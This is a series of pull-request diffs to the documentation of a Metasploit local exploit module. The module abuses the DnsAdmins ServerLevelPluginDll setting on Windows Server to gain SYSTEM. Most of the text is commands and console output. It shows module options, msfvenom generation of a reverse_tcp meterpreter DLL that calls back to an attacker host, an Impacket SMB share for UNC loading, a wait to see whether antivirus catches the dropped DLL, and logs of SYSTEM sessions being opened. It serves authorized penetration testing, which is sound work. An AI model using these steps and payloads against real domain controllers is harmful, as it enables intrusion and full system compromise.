### PR TITLE
Dnsadmin ServerLevelPluginDLL Feature Abuse Privilege Escalation

### DIFF
--- a/documentation/modules/exploit/windows/local/dnsadmin_serverlevelplugindll.md
+++ b/documentation/modules/exploit/windows/local/dnsadmin_serverlevelplugindll.md
@@ -132,6 +132,4 @@ meterpreter >
 ```
 
 ### Notes
-1. This module is not particularly opsec-safe as it drops a DLL to disk, writes to the registry, and is sure to generate a
-a ton of event logs when the DNS service is stopped and restarted.
-2. After exploitation, the DLL cannot be deleted without first stopping the DNS service.
+This module is not particularly opsec-safe as it drops a DLL to disk, writes to the registry, and is sure to generate a ton of event logs when the DNS service is stopped and restarted.

--- a/documentation/modules/exploit/windows/local/dnsadmin_serverlevelplugindll.md
+++ b/documentation/modules/exploit/windows/local/dnsadmin_serverlevelplugindll.md
@@ -2,7 +2,7 @@
 This module exploits a feature in the DNS service of Windows Server. Users of the DnsAdmins group can set the
 `ServerLevelPluginDll` value using dnscmd.exe to create a registry key at `HKLM\SYSTEM\CurrentControlSet\services\DNS\Parameters\`
 named `ServerLevelPluginDll` that can be made to point to an arbitrary DLL. After doing so, restarting the service will load the DLL
-and cause it to execute, providing us with SYSTEM privileges.
+and cause it to execute, providing us with SYSTEM privileges. Increasing WfsDelay is recommended when using a UNC path.
 
 ## Vulnerable Application
 
@@ -12,23 +12,28 @@ Windows Server 2003 and above
 
 1. Get a Meterpreter shell
 2. `use exploit/windows/local/dnsadmin_serverlevelplugindll`
-3. `set PAYLOAD <payload>`
+3. `set PAYLOAD <payload>`. Payload architecture must be the same as the target system
 4. `set LHOST <lhost>`
 5. `set LPORT <lport>`
-6. `set SESSION <session_no>`
+6. `set SESSION <session_no>` to specify session
 7. `set DLLNAME <dllname>` if you want to name your DLL something other than `msf.dll`
 8. `set DLLPATH <dllpath>` if you want to place your DLL somewhere other than `%TEMP%` or want to use a UNC path
-9. `exploit` to get SYSTEM shell
+9. `set MAKEDLL true` if you want to just make the DLL, and not carry out the exploit
+10. `exploit` to get SYSTEM shell if `MAKEDLL` is set to `false`, or to write the DLL to the `~/.msf4/local` folder if `MAKEDLL` is set to `true` 
 
 ## Options
 
-  **DLLNAME**
-  Name of the DLL to use.
+### DLLNAME
+Name of the DLL to use.
 
-  **DLLPATH**
-  Location of the DLL to use. If a UNC path is provided, the module assumes that the operator already has the prerequisites:
-  1. A working SMB2 share (use Impacket's `smbserver.py` to quickly set up one)
-  2. A DLL of the same architecture as the target system
+### DLLPATH
+Location of the DLL to use. If a UNC path is provided, the module assumes that the operator already has the prerequisites:
+1. A working SMB2 share (use Impacket's `smbserver.py` to quickly set up one)
+2. A DLL of the same architecture as the target system
+
+### MAKEDLL
+Just create the DLL, do not exploit.
+Will create a DLL in the `~/.msf4/local` directory if set to `true`
 
 ## Scenarios
 
@@ -39,9 +44,9 @@ msf5 > sessions
 Active sessions
 ===============
 
-  Id  Name  Type                     Information                  Connection
-  --  ----  ----                     -----------                  ----------
-  1         meterpreter x64/windows  BASILISKCORP\salazar @ DC01  192.168.137.139:4444 -> 192.168.137.133:56703 (192.168.137.133)
+  Id  Name  Type                     Information                            Connection
+  --  ----  ----                     -----------                            ----------
+  1         meterpreter x64/windows  BASILISKCORP\salazar.slytherin @ DC01  192.168.137.139:4444 -> 192.168.137.133:56312 (192.168.137.133)
 
 msf5 > use exploit/windows/local/dnsadmin_serverlevelplugindll 
 msf5 exploit(windows/local/dnsadmin_serverlevelplugindll) > set PAYLOAD windows/x64/meterpreter/reverse_tcp
@@ -52,18 +57,28 @@ msf5 exploit(windows/local/dnsadmin_serverlevelplugindll) > set LPORT 4444
 LPORT => 4444
 msf5 exploit(windows/local/dnsadmin_serverlevelplugindll) > set SESSION 1 
 SESSION => 1
+msf5 exploit(windows/local/dnsadmin_serverlevelplugindll) > set VERBOSE true
+VERBOSE => true
 msf5 exploit(windows/local/dnsadmin_serverlevelplugindll) > exploit
 
 [*] Started reverse TCP handler on 192.168.137.139:4444 
+[+] OS seems vulnerable.
+[*] Running check against DC01 as user BASILISKCORP\salazar.slytherin...
+[+] DNS service found on DC01.
+[+] User BASILISKCORP\salazar.slytherin is part of the DnsAdmins group.
+[*] DnsAdmins SID is S-1-5-21-2123406164-4007834289-1418149283-1101
 [*] Checking service state...
-[*] DNS service is running, proceeding...
 [*] Building DLL...
-[*] Writing DLL to C:\Users\salazar\AppData\Local\Temp\msf.dll...
-[*] Modifying ServerLevelPluginDll to point to C:\Users\salazar\AppData\Local\Temp\msf.dll...
+[*] Writing DLL to C:\Users\SALAZA~1.SLY\AppData\Local\Temp\msf.dll...
+[*] Modifying ServerLevelPluginDll to point to C:\Users\SALAZA~1.SLY\AppData\Local\Temp\msf.dll...
 [+] Registry property serverlevelplugindll successfully reset.
 [*] Restarting the DNS service...
 [*] Sending stage (206403 bytes) to 192.168.137.133
-[*] Meterpreter session 2 opened (192.168.137.139:4444 -> 192.168.137.133:59422) at 2020-05-01 03:28:29 +0800
+[*] Meterpreter session 2 opened (192.168.137.139:4444 -> 192.168.137.133:56319) at 2020-05-16 01:41:53 +0800
+
+meterpreter > 
+[*] Erasing ServerLevelPluginDll registry value...
+[*] Removing C:\Users\SALAZA~1.SLY\AppData\Local\Temp\msf.dll...
 
 meterpreter > sysinfo
 Computer        : DC01
@@ -71,7 +86,7 @@ OS              : Windows 2016+ (10.0 Build 17763).
 Architecture    : x64
 System Language : en_US
 Domain          : BASILISKCORP
-Logged On Users : 11
+Logged On Users : 16
 Meterpreter     : x64/windows
 meterpreter > getuid
 Server username: NT AUTHORITY\SYSTEM
@@ -80,18 +95,29 @@ meterpreter >
 
 ### Windows Server 2019 Standard x64, specifying a UNC path for ServerLevelPluginDll
 The fastest way to get a share up and running is to use Impacket's `smbserver`:
-`sudo python3 /usr/share/doc/python3-impacket/examples/smbserver.py -smb2support -ip 192.168.137.139 test ./`
-Generate a DLL using `msfvenom`:
-`msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.137.139 LPORT=4444 -f dll -o test.dll`
+```
+msfdev2@automata-ng:~$ mkdir ~/test; sudo python3 /usr/share/doc/python3-impacket/examples/smbserver.py -smb2support -ip 192.168.137.139 test ~/test
+[sudo] password for msfdev2: 
+Impacket v0.9.20 - Copyright 2019 SecureAuth Corporation
+
+[*] Config file parsed
+[*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
+[*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
+[*] Config file parsed
+[*] Config file parsed
+[*] Config file parsed
+```
+
+You can generate a DLL using the module by setting `MAKEDLL` to `true`:
 ```
 msf5 > sessions
 
 Active sessions
 ===============
 
-  Id  Name  Type                     Information                  Connection
-  --  ----  ----                     -----------                  ----------
-  1         meterpreter x64/windows  BASILISKCORP\salazar @ DC01  192.168.137.139:4444 -> 192.168.137.133:62355 (192.168.137.133)
+  Id  Name  Type                     Information                            Connection
+  --  ----  ----                     -----------                            ----------
+  1         meterpreter x64/windows  BASILISKCORP\salazar.slytherin @ DC01  192.168.137.139:4444 -> 192.168.137.133:56307 (192.168.137.133)
 
 msf5 > use exploit/windows/local/dnsadmin_serverlevelplugindll 
 msf5 exploit(windows/local/dnsadmin_serverlevelplugindll) > set PAYLOAD windows/x64/meterpreter/reverse_tcp
@@ -100,23 +126,64 @@ msf5 exploit(windows/local/dnsadmin_serverlevelplugindll) > set LHOST 192.168.13
 LHOST => 192.168.137.139
 msf5 exploit(windows/local/dnsadmin_serverlevelplugindll) > set LPORT 4444
 LPORT => 4444
-msf5 exploit(windows/local/dnsadmin_serverlevelplugindll) > set DLLPATH \\\\192.168.137.139\\test
-DLLPATH => \\192.168.137.139\test
 msf5 exploit(windows/local/dnsadmin_serverlevelplugindll) > set DLLNAME test.dll
 DLLNAME => test.dll
+msf5 exploit(windows/local/dnsadmin_serverlevelplugindll) > set MAKEDLL true
+MAKEDLL => true
 msf5 exploit(windows/local/dnsadmin_serverlevelplugindll) > set SESSION 1 
 SESSION => 1
 msf5 exploit(windows/local/dnsadmin_serverlevelplugindll) > exploit
 
 [*] Started reverse TCP handler on 192.168.137.139:4444 
+[*] Building DLL...
+[+] test.dll stored at /home/msfdev2/.msf4/local/test.dll
+[*] Exploit completed, but no session was created.
+msf5 exploit(windows/local/dnsadmin_serverlevelplugindll) > 
+```
+
+Once the DLL has been generated, copy it to the folder shared by Impacket's `smbserver`:
+```
+msfdev2@automata-ng:~$ cp /home/msfdev2/.msf4/local/test.dll ~/test/test.dll 
+msfdev2@automata-ng:~$ 
+```
+
+Alternatively, you can generate a DLL using `msfvenom`:
+```
+msfdev2@automata-ng:~$ msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.137.139 LPORT=4444 -f dll -o ~/test/test.dll
+[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
+[-] No arch selected, selecting arch: x64 from the payload
+No encoder or badchars specified, outputting raw payload
+Payload size: 510 bytes
+Final size of dll file: 5120 bytes
+Saved as: /home/msfdev2/test/test.dll
+msfdev2@automata-ng:~$ 
+```
+
+After that, proceed with the actual exploit:
+```
+msf5 exploit(windows/local/dnsadmin_serverlevelplugindll) > set MAKEDLL false
+MAKEDLL => false
+msf5 exploit(windows/local/dnsadmin_serverlevelplugindll) > set DLLPATH \\\\192.168.137.139\\test
+DLLPATH => \\192.168.137.139\test
+msf5 exploit(windows/local/dnsadmin_serverlevelplugindll) > set DLLNAME test.dll
+DLLNAME => test.dll
+msf5 exploit(windows/local/dnsadmin_serverlevelplugindll) > set VERBOSE true
+VERBOSE => true
+msf5 exploit(windows/local/dnsadmin_serverlevelplugindll) > exploit
+
+[*] Started reverse TCP handler on 192.168.137.139:4444 
+[+] OS seems vulnerable.
+[*] Running check against DC01 as user BASILISKCORP\salazar.slytherin...
+[+] DNS service found on DC01.
+[+] User BASILISKCORP\salazar.slytherin is part of the DnsAdmins group.
+[*] DnsAdmins SID is S-1-5-21-2123406164-4007834289-1418149283-1101
 [*] Checking service state...
-[*] DNS service is running, proceeding...
 [*] Using user-provided UNC path.
 [*] Modifying ServerLevelPluginDll to point to \\192.168.137.139\test\test.dll...
 [+] Registry property serverlevelplugindll successfully reset.
 [*] Restarting the DNS service...
 [*] Sending stage (206403 bytes) to 192.168.137.133
-[*] Meterpreter session 2 opened (192.168.137.139:4444 -> 192.168.137.133:62373) at 2020-05-01 02:35:06 +0800
+[*] Meterpreter session 2 opened (192.168.137.139:4444 -> 192.168.137.133:56493) at 2020-05-16 03:45:09 +0800
 
 meterpreter > sysinfo
 Computer        : DC01
@@ -124,12 +191,47 @@ OS              : Windows 2016+ (10.0 Build 17763).
 Architecture    : x64
 System Language : en_US
 Domain          : BASILISKCORP
-Logged On Users : 11
+Logged On Users : 18
 Meterpreter     : x64/windows
 meterpreter > getuid
 Server username: NT AUTHORITY\SYSTEM
 meterpreter > 
 ```
 
-### Notes
-This module is not particularly opsec-safe as it drops a DLL to disk, writes to the registry, and is sure to generate a ton of event logs when the DNS service is stopped and restarted.
+### Windows Server 2019 Standard x64, just creating DLL
+```
+msf5 > sessions
+
+Active sessions
+===============
+
+  Id  Name  Type                     Information                            Connection
+  --  ----  ----                     -----------                            ----------
+  1         meterpreter x64/windows  BASILISKCORP\salazar.slytherin @ DC01  192.168.137.139:4444 -> 192.168.137.133:56478 (192.168.137.133)
+
+msf5 > use exploit/windows/local/dnsadmin_serverlevelplugindll 
+msf5 exploit(windows/local/dnsadmin_serverlevelplugindll) > set PAYLOAD windows/x64/meterpreter/reverse_tcp
+PAYLOAD => windows/x64/meterpreter/reverse_tcp
+msf5 exploit(windows/local/dnsadmin_serverlevelplugindll) > set LHOST 192.168.137.139
+LHOST => 192.168.137.139
+msf5 exploit(windows/local/dnsadmin_serverlevelplugindll) > set LPORT 4444
+LPORT => 4444
+msf5 exploit(windows/local/dnsadmin_serverlevelplugindll) > set SESSION 1 
+SESSION => 1
+msf5 exploit(windows/local/dnsadmin_serverlevelplugindll) > set MAKEDLL true
+MAKEDLL => true
+msf5 exploit(windows/local/dnsadmin_serverlevelplugindll) > set DLLNAME test.dll
+DLLNAME => test.dll
+msf5 exploit(windows/local/dnsadmin_serverlevelplugindll) > exploit
+
+[*] Started reverse TCP handler on 192.168.137.139:4444 
+[*] Building DLL...
+[+] test.dll stored at /home/msfdev2/.msf4/local/test.dll
+[*] Exploit completed, but no session was created.
+msf5 exploit(windows/local/dnsadmin_serverlevelplugindll) > 
+```
+
+## Notes
+1. This module is not particularly opsec-safe as it drops a DLL to disk, writes to the registry, and is sure to generate a ton of event logs when the DNS service is stopped and restarted.
+2. The service will crash if the DLL used does not contain the right exports, so using the `msfvenom` generated DLL will definitely cause it to crash.
+3. Automatic cleanup of the dropped DLL is attempted if the DLL has been written to disk, but if automatic cleanup fails manual cleanup may be necessary.

--- a/documentation/modules/exploit/windows/local/dnsadmin_serverlevelplugindll.md
+++ b/documentation/modules/exploit/windows/local/dnsadmin_serverlevelplugindll.md
@@ -88,7 +88,7 @@ Architecture    : x64
 System Language : en_US
 Domain          : BASILISKCORP
 Logged On Users : 11
-gMeterpreter     : x64/windows
+Meterpreter     : x64/windows
 meterpreter > getuid
 Server username: NT AUTHORITY\SYSTEM
 meterpreter > 

--- a/documentation/modules/exploit/windows/local/dnsadmin_serverlevelplugindll.md
+++ b/documentation/modules/exploit/windows/local/dnsadmin_serverlevelplugindll.md
@@ -24,6 +24,35 @@ are recommended to increase the value of WfsDelay to prevent potential timeouts.
 
 Windows Server 2003 and above
 
+### Setup Steps (Windows Server 2019 Standard)
+1. Install Windows Server 2019 Standard with GUI
+2. Install and configure Active Directory Domain Services and DNS services.
+3. Promote the server to a domain controller once the initial setup wizard is 
+   complete. This will complete the setup of the AD.
+4. Reboot
+5. Add a new user which I called normal and set its password to a long string such as 
+`thisIsADamnGoodPassword123!`. Don't use any other special characters or you may end up 
+violating the default password policy.
+6. Add this new user to two groups: `DnsAdmins` (should have been created with the installation of 
+the DNS server and the AD Server), and `Remote Desktop Users`. See https://www.snel.com/support/create-user-and-allow-rdp-permission-on-windows-server-2016/ for info on how to do this.
+7. To go `Group Policy Management -> Forest -> Domains -> *your domain name* -> Domain Controllers -> 
+Default Domain Controllers Policy` and right click on it, then select Edit. From here select Policies -> 
+Windows Settings -> Security Settings -> Local Policies -> User Right Managements and then select 
+the Allow log on locally policy underneath this and double click on it. Ensure the Define these 
+policy settings option is checked, and then select Add User or Group and add in the name of the 
+user that you just created. It should look something in the format of *domain name*\*user name*. 
+Then click Apply and click OK.
+8. Run gpupdate again.
+9. Reboot
+10. You should now be able to log in as the new user, which should also be in the DnsAdmins group. 
+You can confirm this by running `net localgroup DnsAdmins` and confirming that the new user is 
+listed as a member of this group in the output returned.
+11. Run `wmic useraccount where name='*username of the new account*'` to get the SID of the 
+new account that you added in earlier.
+12. Run `sc sdset "DNS" D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)(A;;CR;;;AU)(A;;CCLCSWRPWPDTLOCRRC;;;PU)(A;;RPWPDTLO;;;S-x-x-xx-xxxxxxxxxx-xxxxxxxxxx-xxxxxxxxx-xxxx)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)` 
+in an elevated command prompt replacing the sample SID with the SID obtained via the earlier command 
+(aka the SID of the new low privileged user you added).
+
 ## Verification Steps
 
 1. Get a Meterpreter shell

--- a/documentation/modules/exploit/windows/local/dnsadmin_serverlevelplugindll.md
+++ b/documentation/modules/exploit/windows/local/dnsadmin_serverlevelplugindll.md
@@ -1,56 +1,61 @@
-## Introduction
-This module exploits a feature in the DNS service of Windows Server. Users of the DnsAdmins group can set the
-`ServerLevelPluginDll` value using dnscmd.exe to create a registry key at
-`HKLM\SYSTEM\CurrentControlSet\services\DNS\Parameters\` named `ServerLevelPluginDll` that can be 
-made to point to an arbitrary DLL. Restarting the DNS service will then result in the attacker's DLL 
-being loaded and executed as the SYSTEM user, thereby granting the attacker SYSTEM privileges.
-
-Note that there is a slight possibilty that antivirus may pick up on the DLL file which is dropped on 
-the system for this exploit to work. In this case it will not be possible to restart the DNS service 
-via the Service Manager. To resolve this, users must first delete the `ServerLevelPluginDll` value 
-under the `HKLM\\SYSTEM\\CurrentControlSet\\Services\\DNS\\Parameters\\` key using an administrator 
-account, after which they will then be able to restart the DNS service once again.
-
-To avoid the potential of this occuring, this module has a configurable option, `AVTIMEOUT`, 
-which allows users to configure how long they would like to wait for any potential AV to pick 
-up on the file after which the module will then check to ensure the dropped DLL file exists 
-prior to creating the `ServerLevelPluginDll` value within the
-`HKLM\\SYSTEM\\CurrentControlSet\\Services\\DNS\\Parameters\\` key.
-
-Users wishing to use this module with UNC paths to load the DLL from a SMB share onto the target
-are recommended to increase the value of WfsDelay to prevent potential timeouts.
-
 ## Vulnerable Application
 
 Windows Server 2003 and above
 
+#### Introduction
+This module exploits a feature in the DNS service of Windows Server. Users of the DnsAdmins group can set the
+`ServerLevelPluginDll` value using dnscmd.exe to create a registry key at
+`HKLM\SYSTEM\CurrentControlSet\services\DNS\Parameters\` named `ServerLevelPluginDll` that can be
+made to point to an arbitrary DLL. Restarting the DNS service will then result in the attacker's DLL
+being loaded and executed as the SYSTEM user, thereby granting the attacker SYSTEM privileges.
+
+Note that if the option to drop the DLL file on the host is selected (instead of the option to use a UNC path), there is a possibility
+that antivirus may detect the DLL file and remove it. In this case it will not be possible to restart the DNS service via the
+Service Manager without first clearing out the `ServerLevelPluginDll` value of the
+`HKLM\SYSTEM\CurrentControlSet\Services\DNS\Parameters\`
+key using an account with administrator privileges.
+
+To avoid the potential of this occurring, this module has a configurable option, `AVTIMEOUT`, which allows users to configure
+how long they would like to wait for any potential AV to pick up on the file after which the module will then check to
+ensure the dropped DLL file exists prior to creating the `ServerLevelPluginDll` value within the
+`HKLM\SYSTEM\CurrentControlSet\Services\DNS\Parameters\` key.
+
+It should also be noted that the UNC path option may run into a similar issue if an incorrect IP address is typed in, so users should
+be especially careful when setting the value of `DLLPATH` to ensure that they don't inadvertently set an incorrect IP address and thereby
+prevent the DNS server from being able to restart.
+
+This module has only been tested and confirmed to work on Windows Server 2019 Standard Edition, however it should work against any Windows
+Server version up to and including Windows Server 2019.
+
 ### Setup Steps (Windows Server 2019 Standard)
 1. Install Windows Server 2019 Standard with GUI
 2. Install and configure Active Directory Domain Services and DNS services.
-3. Promote the server to a domain controller once the initial setup wizard is 
+3. Promote the server to a domain controller once the initial setup wizard is
    complete. This will complete the setup of the AD.
 4. Reboot
-5. Add a new user which I called normal and set its password to a long string such as 
-`thisIsADamnGoodPassword123!`. Don't use any other special characters or you may end up 
+5. Add a new user which I called normal and set its password to a long string such as
+`thisIsADamnGoodPassword123!`. Don't use any other special characters or you may end up
 violating the default password policy.
-6. Add this new user to two groups: `DnsAdmins` (should have been created with the installation of 
-the DNS server and the AD Server), and `Remote Desktop Users`. See https://www.snel.com/support/create-user-and-allow-rdp-permission-on-windows-server-2016/ for info on how to do this.
-7. To go `Group Policy Management -> Forest -> Domains -> *your domain name* -> Domain Controllers -> 
-Default Domain Controllers Policy` and right click on it, then select Edit. From here select Policies -> 
-Windows Settings -> Security Settings -> Local Policies -> User Right Managements and then select 
-the Allow log on locally policy underneath this and double click on it. Ensure the Define these 
-policy settings option is checked, and then select Add User or Group and add in the name of the 
-user that you just created. It should look something in the format of *domain name*\*user name*. 
+6. Add this new user to two groups: `DnsAdmins` (should have been created with the installation of
+the DNS server and the AD Server), and `Remote Desktop Users`.
+See https://www.snel.com/support/create-user-and-allow-rdp-permission-on-windows-server-2016/ for info
+on how to do this.
+7. To go `Group Policy Management -> Forest -> Domains -> *your domain name* -> Domain Controllers ->
+Default Domain Controllers Policy` and right click on it, then select Edit. From here select Policies ->
+Windows Settings -> Security Settings -> Local Policies -> User Right Managements and then select
+the Allow log on locally policy underneath this and double click on it. Ensure the Define these
+policy settings option is checked, and then select Add User or Group and add in the name of the
+user that you just created. It should look something in the format of *domain name*\*user name*.
 Then click Apply and click OK.
 8. Run gpupdate again.
 9. Reboot
-10. You should now be able to log in as the new user, which should also be in the DnsAdmins group. 
-You can confirm this by running `net localgroup DnsAdmins` and confirming that the new user is 
+10. You should now be able to log in as the new user, which should also be in the DnsAdmins group.
+You can confirm this by running `net localgroup DnsAdmins` and confirming that the new user is
 listed as a member of this group in the output returned.
-11. Run `wmic useraccount where name='*username of the new account*'` to get the SID of the 
+11. Run `wmic useraccount where name='*username of the new account*'` to get the SID of the
 new account that you added in earlier.
-12. Run `sc sdset "DNS" D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)(A;;CR;;;AU)(A;;CCLCSWRPWPDTLOCRRC;;;PU)(A;;RPWPDTLO;;;S-x-x-xx-xxxxxxxxxx-xxxxxxxxxx-xxxxxxxxx-xxxx)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)` 
-in an elevated command prompt replacing the sample SID with the SID obtained via the earlier command 
+12. Run `sc sdset "DNS" D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)(A;;CR;;;AU)(A;;CCLCSWRPWPDTLOCRRC;;;PU)(A;;RPWPDTLO;;;S-x-x-xx-xxxxxxxxxx-xxxxxxxxxx-xxxxxxxxx-xxxx)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)`
+in an elevated command prompt replacing the sample SID with the SID obtained via the earlier command
 (aka the SID of the new low privileged user you added).
 
 ## Verification Steps
@@ -64,7 +69,8 @@ in an elevated command prompt replacing the sample SID with the SID obtained via
 7. `set DLLNAME <dllname>` if you want to name your DLL something other than `msf.dll`
 8. `set DLLPATH <dllpath>` if you want to place your DLL somewhere other than `%TEMP%` or if you want to use a UNC path
 9. `set MAKEDLL true` if you want to just make the DLL, and not carry out the exploit
-10. `exploit` to get SYSTEM shell if `MAKEDLL` is set to `false`, or to write the DLL to the `~/.msf4/local` folder if `MAKEDLL` is set to `true` 
+10. `exploit` to get SYSTEM shell if `MAKEDLL` is set to `false`, or to write
+the DLL to the `~/.msf4/local` folder if `MAKEDLL` is set to `true`
 
 ## Options
 
@@ -74,15 +80,16 @@ Name of the DLL to use.
 ### DLLPATH
 Location of the DLL to use. If a UNC path is provided, the module will assume that the operator
 has already performed the following actions:
-1. Set up a working SMB2 share (via a tool such as Impacket's `smbserver.py`)
+1. Set up a working SMB2 share (via a tool such as Impacket's `smbserver.py` via a command such as
+`sudo python3 smbserver.py -smb2support -ip 172.17.168.195 test /home/gwillcox/.msf4/local/`
 2. Created a DLL of the same architecture as the target system and placed in within this share.
 
 ### MAKEDLL
-If set to `true`, then just create the DLL, do not conduct the full exploit. 
+If set to `true`, then just create the DLL, do not conduct the full exploit.
 The resulting DLL will be stored in the `~/.msf4/local` directory.
 
 ### AVTIMEOUT
-Time, in seconds, to wait for any AV on the target system to potentially pick up on the 
+Time, in seconds, to wait for any AV on the target system to potentially pick up on the
 dropped DLL file, prior to the module checking to see if the DLL file still exists. This
 is needed to prevent a scenario where the DLL file gets removed and the module tries to make
 changes that could prevent the DNS server from being able to start.
@@ -91,63 +98,99 @@ changes that could prevent the DNS server from being able to start.
 
 ### Windows Server 2019 Standard x64, writing `msf.dll` to `%TEMP%`
 ```
-msf5 > sessions
+msf6 exploit(multi/handler) > use exploit/windows/local/dnsadmin_serverlevelplugindll 
+s[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
+msf6 exploit(windows/local/dnsadmin_serverlevelplugindll) > show options
+
+Module options (exploit/windows/local/dnsadmin_serverlevelplugindll):
+
+   Name       Current Setting  Required  Description
+   ----       ---------------  --------  -----------
+   AVTIMEOUT  60               yes       Time to wait for AV to potentially notice the DLL file we dropped, in seconds.
+   DLLNAME    msf.dll          yes       DLL name (default: msf.dll)
+   DLLPATH    %TEMP%           yes       Path to DLL. Can be a UNC path. (default: %TEMP%)
+   MAKEDLL    false            yes       Just create the DLL, do not exploit.
+   SESSION                     yes       The session to run this module on.
+
+
+Payload options (windows/meterpreter/reverse_tcp):
+
+   Name      Current Setting  Required  Description
+   ----      ---------------  --------  -----------
+   EXITFUNC  thread           yes       Exit technique (Accepted: '', seh, thread, process, none)
+   LHOST     172.17.168.195   yes       The listen address (an interface may be specified)
+   LPORT     4444             yes       The listen port
+
+
+Exploit target:
+
+   Id  Name
+   --  ----
+   0   Automatic
+
+
+msf6 exploit(windows/local/dnsadmin_serverlevelplugindll) > set PAYLOAD windows/x64/meterpreter/bind_tcp
+PAYLOAD => windows/x64/meterpreter/bind_tcp
+msf6 exploit(windows/local/dnsadmin_serverlevelplugindll) > set RHOST 172.17.169.123
+RHOST => 172.17.169.123
+msf6 exploit(windows/local/dnsadmin_serverlevelplugindll) > set SESSION 1 
+SESSION => 1
+msf6 exploit(windows/local/dnsadmin_serverlevelplugindll) > set LPORT 7788
+LPORT => 7788
+msf6 exploit(windows/local/dnsadmin_serverlevelplugindll) > exploit
+
+[*] Checking service state...
+[*] Building DLL...
+[+] Wrote DLL to C:\Users\normal\AppData\Local\Temp\1\msf.dll!
+[*] Sleeping for 60 seconds to ensure the file wasn't caught by any AV...
+[+] Looks like our file wasn't caught by the AV.
+[!] Entering danger section...
+[*] Modifying ServerLevelPluginDll to point to C:\Users\normal\AppData\Local\Temp\1\msf.dll...
+[+] Registry property serverlevelplugindll successfully reset.
+[*] Restarting the DNS service...
+[*] Started bind TCP handler against 172.17.169.123:7788
+[*] Sending stage (200262 bytes) to 172.17.169.123
+[*] Meterpreter session 2 opened (0.0.0.0:0 -> 172.17.169.123:7788) at 2020-09-09 14:48:59 -0500
+
+meterpreter > 
+[+] Exited danger zone successfully!
+
+meterpreter > getuid
+Server username: NT AUTHORITY\SYSTEM
+meterpreter > background
+[*] Backgrounding session 2...
+msf6 exploit(windows/local/dnsadmin_serverlevelplugindll) > sessions
 
 Active sessions
 ===============
 
   Id  Name  Type                     Information                            Connection
   --  ----  ----                     -----------                            ----------
-  1         meterpreter x64/windows  BASILISKCORP\salazar.slytherin @ DC01  192.168.137.139:4444 -> 192.168.137.133:56312 (192.168.137.133)
+  1         meterpreter x64/windows  RAPID7\normal @ WIN-M5JU6L5RA9L        0.0.0.0:0 -> 172.17.169.123:4444 (172.17.169.123)
+  2         meterpreter x64/windows  NT AUTHORITY\SYSTEM @ WIN-M5JU6L5RA9L  0.0.0.0:0 -> 172.17.169.123:7788 (172.17.169.123)
 
-msf5 > use exploit/windows/local/dnsadmin_serverlevelplugindll 
-msf5 exploit(windows/local/dnsadmin_serverlevelplugindll) > set PAYLOAD windows/x64/meterpreter/reverse_tcp
-PAYLOAD => windows/x64/meterpreter/reverse_tcp
-msf5 exploit(windows/local/dnsadmin_serverlevelplugindll) > set LHOST 192.168.137.139
-LHOST => 192.168.137.139
-msf5 exploit(windows/local/dnsadmin_serverlevelplugindll) > set LPORT 4444
-LPORT => 4444
-msf5 exploit(windows/local/dnsadmin_serverlevelplugindll) > set SESSION 1 
-SESSION => 1
-msf5 exploit(windows/local/dnsadmin_serverlevelplugindll) > set VERBOSE true
-VERBOSE => true
-msf5 exploit(windows/local/dnsadmin_serverlevelplugindll) > exploit
+msf6 exploit(windows/local/dnsadmin_serverlevelplugindll) > sessions -i 2
+[*] Starting interaction with 2...
 
-[*] Started reverse TCP handler on 192.168.137.139:4444 
-[+] OS seems vulnerable.
-[*] Running check against DC01 as user BASILISKCORP\salazar.slytherin...
-[+] DNS service found on DC01.
-[+] User BASILISKCORP\salazar.slytherin is part of the DnsAdmins group.
-[*] DnsAdmins SID is S-1-5-21-2123406164-4007834289-1418149283-1101
-[*] Checking service state...
-[*] Building DLL...
-[*] Writing DLL to C:\Users\SALAZA~1.SLY\AppData\Local\Temp\msf.dll...
-[*] Modifying ServerLevelPluginDll to point to C:\Users\SALAZA~1.SLY\AppData\Local\Temp\msf.dll...
-[+] Registry property serverlevelplugindll successfully reset.
-[*] Restarting the DNS service...
-[*] Sending stage (206403 bytes) to 192.168.137.133
-[*] Meterpreter session 2 opened (192.168.137.139:4444 -> 192.168.137.133:56319) at 2020-05-16 01:41:53 +0800
-
-meterpreter > 
-[*] Erasing ServerLevelPluginDll registry value...restarting.
-Computer        : DC01
+meterpreter > sysinfo
+Computer        : WIN-M5JU6L5RA9L
 OS              : Windows 2016+ (10.0 Build 17763).
 Architecture    : x64
 System Language : en_US
-Domain          : BASILISKCORP
-Logged On Users : 16
+Domain          : RAPID7
+Logged On Users : 12
 Meterpreter     : x64/windows
-meterpreter > getuid
-Server username: NT AUTHORITY\SYSTEM
 meterpreter > 
 ```
 
 ### Windows Server 2019 Standard x64, specifying a UNC path for ServerLevelPluginDll
-The fastest way to get a share up and running is to use Impacket's `smbserver`:
+The easiest way to set this up is to Impacket's `smbserver`. You can find the source code for Impacket at https://github.com/SecureAuthCorp/impacket.
+Download the latest release and untar it, then `cd` into the new directory that is created. You should see a file named `setup.py`. Run the command
+`sudo python3 setup.py install` and it will install Impacket for you. Once this is done, navigate to the `examples` directory and follow the following steps:
+
 ```
-msfdev2@automata-ng:~$ mkdir ~/test; sudo python3 /usr/share/doc/python3-impacket/examples/smbserver.py -smb2support -ip 192.168.137.139 test ~/test
-[sudo] password for msfdev2: 
-Impacket v0.9.20 - Copyright 2019 SecureAuth Corporation
